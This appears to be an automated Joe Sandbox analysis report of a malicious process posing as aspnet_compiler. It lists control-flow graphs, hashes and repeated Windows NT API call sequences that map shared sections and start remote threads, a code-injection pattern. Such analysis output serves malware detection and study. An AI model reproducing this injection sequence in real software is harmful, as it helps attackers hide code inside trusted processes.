                                                                                                                                                                                                              • API String ID: 0-2049395529
                                                                                                                                                                                                              • Opcode ID: 8ffad8fb7c82346ae92f052a1bcb92565e057cabc10113b4f133fa5964e13e25
                                                                                                                                                                                                              • Instruction ID: 79752df4a1b9a795a5da724dc3dd6b4961abf8f574abba478880318345ecb8d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ffad8fb7c82346ae92f052a1bcb92565e057cabc10113b4f133fa5964e13e25
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF012660B093991FC72A06681C256BA6FF24FC3611F1905EBD081DF247DD314C4A83A7

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:8.4%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:57.1%
                                                                                                                                                                                                              Total number of Nodes:56
                                                                                                                                                                                                              Total number of Limit Nodes:2
                                                                                                                                                                                                              execution_graph 2067 402d65 2069 402d69 2067->2069 2068 4018a6 8 API calls 2070 402ea5 2068->2070 2069->2068 2069->2070 2145 4018b1 2146 401903 2145->2146 2148 4018b5 2145->2148 2147 4014bf 7 API calls 2146->2147 2150 40191a 2146->2150 2147->2150 2149 4018ee Sleep 2148->2149 2149->2146 2091 4014d6 2092 4014c4 2091->2092 2093 40156f NtDuplicateObject 2092->2093 2102 40168b 2092->2102 2094 40158c NtCreateSection 2093->2094 2093->2102 2095 4015b2 NtMapViewOfSection 2094->2095 2096 40160c NtCreateSection 2094->2096 2095->2096 2097 4015d5 NtMapViewOfSection 2095->2097 2098 401638 2096->2098 2096->2102 2097->2096 2099 4015f3 2097->2099 2100 401642 NtMapViewOfSection 2098->2100 2098->2102 2099->2096 2101 401669 NtMapViewOfSection 2100->2101 2100->2102 2101->2102 2063 402f5d 2064 4030b4 2063->2064 2065 402f87 2063->2065 2065->2064 2066 403042 RtlCreateUserThread NtTerminateProcess 2065->2066 2066->2064 2037 402dfe 2038 402dee 2037->2038 2040 402ea5 2038->2040 2041 4018a6 2038->2041 2042 4018b7 2041->2042 2043 4018ee Sleep 2042->2043 2044 401903 2043->2044 2046 40191a 2044->2046 2047 4014bf 2044->2047 2046->2040 2048 4014ce 2047->2048 2049 40156f NtDuplicateObject 2048->2049 2055 40168b 2048->2055 2050 40158c NtCreateSection 2049->2050 2049->2055 2051 4015b2 NtMapViewOfSection 2050->2051 2052 40160c NtCreateSection 2050->2052 2051->2052 2053 4015d5 NtMapViewOfSection 2051->2053 2054 401638 2052->2054 2052->2055 2053->2052 2056 4015f3 2053->2056 2054->2055 2057 401642 NtMapViewOfSection 2054->2057 2055->2046 2056->2052 2057->2055 2058 401669 NtMapViewOfSection 2057->2058 2058->2055 2151 4018be 2152 4018b7 2151->2152 2153 4018ee Sleep 2152->2153 2154 401903 2153->2154 2155 4014bf 7 API calls 2154->2155 2156 40191a 2154->2156 2155->2156 2059 4030bf 2060 403055 RtlCreateUserThread NtTerminateProcess 2059->2060 2062 4030d1 2059->2062 2061 4030b4 2060->2061 2062->2062

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 4014d6-4014d7 1 4014c4-4014c8 0->1 2 4014d8-401519 call 401164 0->2 1->2 13 40151b 2->13 14 40151e-401523 2->14 13->14 16 401529-40153a 14->16 17 40184d-401855 14->17 21 401540-401569 16->21 22 40184b 16->22 17->14 20 40185a-401883 17->20 29 401874-40187f 20->29 30 401886-4018a3 call 401164 20->30 21->22 31 40156f-401586 NtDuplicateObject 21->31 22->20 29->30 31->22 33 40158c-4015b0 NtCreateSection 31->33 35 4015b2-4015d3 NtMapViewOfSection 33->35 36 40160c-401632 NtCreateSection 33->36 35->36 37 4015d5-4015f1 NtMapViewOfSection 35->37 36->22 38 401638-40163c 36->38 37->36 41 4015f3-401609 37->41 38->22 42 401642-401663 NtMapViewOfSection 38->42 41->36 42->22 44 401669-401685 NtMapViewOfSection 42->44 44->22 46 40168b call 401690 44->46
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Section$CreateDuplicateObjectView
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1652636561-0
                                                                                                                                                                                                              • Opcode ID: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                                                                                                                                                                                              • Instruction ID: b0857a4fb145544e41851af17f16183f6357fb9efc2fe45eaf6198d87de3a54a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8681E171600248BBDB218FA5DC88FEB7FB8FF86710F10416AF951BA1E5D6749901CB64

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 48 4014bf-4014c8 49 4014d8 48->49 50 4014ce-401519 call 401164 48->50 49->50 60 40151b 50->60 61 40151e-401523 50->61 60->61 63 401529-40153a 61->63 64 40184d-401855 61->64 68 401540-401569 63->68 69 40184b 63->69 64->61 67 40185a-401883 64->67 76 401874-40187f 67->76 77 401886-4018a3 call 401164 67->77 68->69 78 40156f-401586 NtDuplicateObject 68->78 69->67 76->77 78->69 80 40158c-4015b0 NtCreateSection 78->80 82 4015b2-4015d3 NtMapViewOfSection 80->82 83 40160c-401632 NtCreateSection 80->83 82->83 84 4015d5-4015f1 NtMapViewOfSection 82->84 83->69 85 401638-40163c 83->85 84->83 88 4015f3-401609 84->88 85->69 89 401642-401663 NtMapViewOfSection 85->89 88->83 89->69 91 401669-401685 NtMapViewOfSection 89->91 91->69 93 40168b call 401690 91->93
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                                                                                              • Opcode ID: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                                                                                                                                                                                              • Instruction ID: cb32da509904316ed93400f6898fa9d135e0c3db95e2781c81c9f365a62fd76c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D617F71A00244FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA1E4D6749A01DB65

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 95 4014e8 96 4014e0-4014e5 95->96 97 4014ec-401519 call 401164 95->97 96->97 103 40151b 97->103 104 40151e-401523 97->104 103->104 106 401529-40153a 104->106 107 40184d-401855 104->107 111 401540-401569 106->111 112 40184b 106->112 107->104 110 40185a-401883 107->110 119 401874-40187f 110->119 120 401886-4018a3 call 401164 110->120 111->112 121 40156f-401586 NtDuplicateObject 111->121 112->110 119->120 121->112 123 40158c-4015b0 NtCreateSection 121->123 125 4015b2-4015d3 NtMapViewOfSection 123->125 126 40160c-401632 NtCreateSection 123->126 125->126 127 4015d5-4015f1 NtMapViewOfSection 125->127 126->112 128 401638-40163c 126->128 127->126 131 4015f3-401609 127->131 128->112 132 401642-401663 NtMapViewOfSection 128->132 131->126 132->112 134 401669-401685 NtMapViewOfSection 132->134 134->112 136 40168b call 401690 134->136
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                                                                                              • Opcode ID: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                                                                                                                                                                                              • Instruction ID: a9c2a09af8f6974916e8dbce0e9e74a1ab8539b6b4ce2c8be6c8dc9eb24f9302
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 675127B5900245BBEB209F91CC48FABBBB8EF85B00F104169FA11BA2E5D6759941CB24

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 138 4014eb-401519 call 401164 143 40151b 138->143 144 40151e-401523 138->144 143->144 146 401529-40153a 144->146 147 40184d-401855 144->147 151 401540-401569 146->151 152 40184b 146->152 147->144 150 40185a-401883 147->150 159 401874-40187f 150->159 160 401886-4018a3 call 401164 150->160 151->152 161 40156f-401586 NtDuplicateObject 151->161 152->150 159->160 161->152 163 40158c-4015b0 NtCreateSection 161->163 165 4015b2-4015d3 NtMapViewOfSection 163->165 166 40160c-401632 NtCreateSection 163->166 165->166 167 4015d5-4015f1 NtMapViewOfSection 165->167 166->152 168 401638-40163c 166->168 167->166 171 4015f3-401609 167->171 168->152 172 401642-401663 NtMapViewOfSection 168->172 171->166 172->152 174 401669-401685 NtMapViewOfSection 172->174 174->152 176 40168b call 401690 174->176
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                                                                                              • Opcode ID: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                                                                                                                                                                                              • Instruction ID: 9bfdfe9cbb785be4fdfd0dd6995845ce59af7eac5c2f91023a42677e7735ba1d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D5127B5900248BBEB209F91CC48FAFBBB8EF85B00F104159FA11BA2E5D6719905CB64

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 178 402f5d-402f81 179 4030b4-4030b9 178->179 180 402f87-402f9f 178->180 180->179 181 402fa5-402fb6 180->181 182 402fb8-402fc1 181->182 183 402fc6-402fd4 182->183 183->183 184 402fd6-402fdd 183->184 185 402fff-403006 184->185 186 402fdf-402ffe 184->186 187 403028-40302b 185->187 188 403008-403027 185->188 186->185 189 403034 187->189 190 40302d-403030 187->190 188->187 189->182 192 403036-40303b 189->192 190->189 191 403032 190->191 191->192 192->179 193 40303d-403040 192->193 193->179 194 403042-4030b1 RtlCreateUserThread NtTerminateProcess 193->194 194->179
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateProcessTerminateThreadUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1921587553-0
                                                                                                                                                                                                              • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                                                                                              • Instruction ID: 028c31f760cafe6bdfeacd3711728474bc178c938afdf01909161d150e4b5d3c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84416831228D094FD768EF5CA845762B7D5F798351F6643AAE809D3389EA34DC1183C6

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 195 4030bf-4030cf 196 4030d1-403109 195->196 197 403055-4030b1 RtlCreateUserThread NtTerminateProcess 195->197 201 403113-403118 196->201 202 40310b 196->202 198 4030b4-4030b9 197->198 203 40311a 201->203 204 40311f-403141 call 4011db 201->204 202->201 205 40310d-403110 202->205 203->204 206 40311c 203->206 211 403145 204->211 205->201 206->204 211->211
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateProcessTerminateThreadUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1921587553-0
                                                                                                                                                                                                              • Opcode ID: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
                                                                                                                                                                                                              • Instruction ID: 715d93b18a869b872d6bab68aa9d9aa25fe40f65b3c459de5f1da0bbea4f6161
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 222105309087448FE3549F7C98423A6BFE0EB4A311F6805AFD596DA2D2D33E5A46C787

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 212 4018c5-40190b call 401164 Sleep call 4013cc 222 40191a-401920 212->222 223 40190d-401915 call 4014bf 212->223 226 401931 222->226 227 401928-40192d 222->227 223->222 226->227 228 401934-40194f 226->228 227->228 233 401952-40195b call 401164 228->233 234 401948-40194b 228->234 234->233
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                                                                                • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                                                                                • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                              • String ID: zOji
                                                                                                                                                                                                              • API String ID: 4152845823-4118548424
                                                                                                                                                                                                              • Opcode ID: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                                                                                                                                                                                              • Instruction ID: 5008de21d6646d6a4101a84352d49cb2eeb815b2728bacd1896cd8e4e39b07a0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46018BB2308205EBDB006E949C61EAE3658AB40724F308033F607780F1C67D8A13F31B

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 237 4018a6-4018c3 241 4018d4 237->241 242 4018c8-40190b call 401164 Sleep call 4013cc 237->242 241->242 252 40191a-401920 242->252 253 40190d-401915 call 4014bf 242->253 256 401931 252->256 257 401928-40192d 252->257 253->252 256->257 258 401934-40194f 256->258 257->258 263 401952-40195b call 401164 258->263 264 401948-40194b 258->264 264->263
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                                                                                • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                                                                                • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4152845823-0
                                                                                                                                                                                                              • Opcode ID: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                                                                                                                                                                                              • Instruction ID: ec7c9f9116aa5c3d7af92c99ccf4db412f3ff1557a2b92ce3f8b18b7d449fb36
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97016DB2308305EBE7006A959C51EBA3758AB41764F308133B607780F1957D9A17B36F

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 267 4018be-4018c3 271 4018d4 267->271 272 4018c8-40190b call 401164 Sleep call 4013cc 267->272 271->272 282 40191a-401920 272->282 283 40190d-401915 call 4014bf 272->283 286 401931 282->286 287 401928-40192d 282->287 283->282 286->287 288 401934-40194f 286->288 287->288 293 401952-40195b call 401164 288->293 294 401948-40194b 288->294 294->293
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                                                                                • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                                                                                • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4152845823-0
                                                                                                                                                                                                              • Opcode ID: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                                                                                                                                                                                              • Instruction ID: cc5cf84a4ac16d3ff6e0150408ab5a4d949569ac012fe2ee23f61dbe8ee8ec54
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70014CB2308205EBDB106A959C51EBE3659AB55714F308133B607784F1967D9B13F32B

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 297 4018b1-4018b3 298 401903-40190b call 4013cc 297->298 299 4018b5-4018c3 297->299 306 40191a-401920 298->306 307 40190d-401915 call 4014bf 298->307 302 4018d4 299->302 303 4018c8-401900 call 401164 Sleep 299->303 302->303 303->298 312 401931 306->312 313 401928-40192d 306->313 307->306 312->313 316 401934-40194f 312->316 313->316 322 401952-40195b call 401164 316->322 323 401948-40194b 316->323 323->322
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                                                              • Opcode ID: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                                                                                                                                                                                              • Instruction ID: ef1b3772686a797e33556ea01ceab6b668eb93d7b49977ee198856b5a882b22d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 210125B2208245EADB006A959C61EBA3799AB41724F308137F607790F1967E8A13F31B

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 326 4018c2-40190b call 401164 Sleep call 4013cc 338 40191a-401920 326->338 339 40190d-401915 call 4014bf 326->339 342 401931 338->342 343 401928-40192d 338->343 339->338 342->343 344 401934-40194f 342->344 343->344 349 401952-40195b call 401164 344->349 350 401948-40194b 344->350 350->349
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                                                                                • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                                                                                • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4152845823-0
                                                                                                                                                                                                              • Opcode ID: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                                                                                                                                                                              • Instruction ID: d3c1b2561fc0583f1f6bbc3edf5ccb050f557452f45edf8007d0f6b78c0567ac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14017CB2308205EBDB006A919C51EBE3759AB41724F308133F607780F1967D8A13F31B

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 353 4018da-40190b call 401164 Sleep call 4013cc 360 40191a-401920 353->360 361 40190d-401915 call 4014bf 353->361 364 401931 360->364 365 401928-40192d 360->365 361->360 364->365 366 401934-40194f 364->366 365->366 371 401952-40195b call 401164 366->371 372 401948-40194b 366->372 372->371
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                                                                                • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                                                                                • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4152845823-0
                                                                                                                                                                                                              • Opcode ID: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                                                                                                                                                                                              • Instruction ID: 8f9a98739febab8b32419077b991bda00f1387bd451c7178a571841fb0c6b49c
